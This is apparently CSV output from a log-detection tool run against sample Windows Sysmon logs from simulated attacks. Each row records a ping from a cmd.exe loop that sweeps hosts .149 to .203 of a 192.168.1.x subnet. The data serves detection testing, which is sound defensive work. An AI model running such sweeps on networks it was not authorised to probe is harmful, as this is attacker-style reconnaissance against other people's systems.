2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
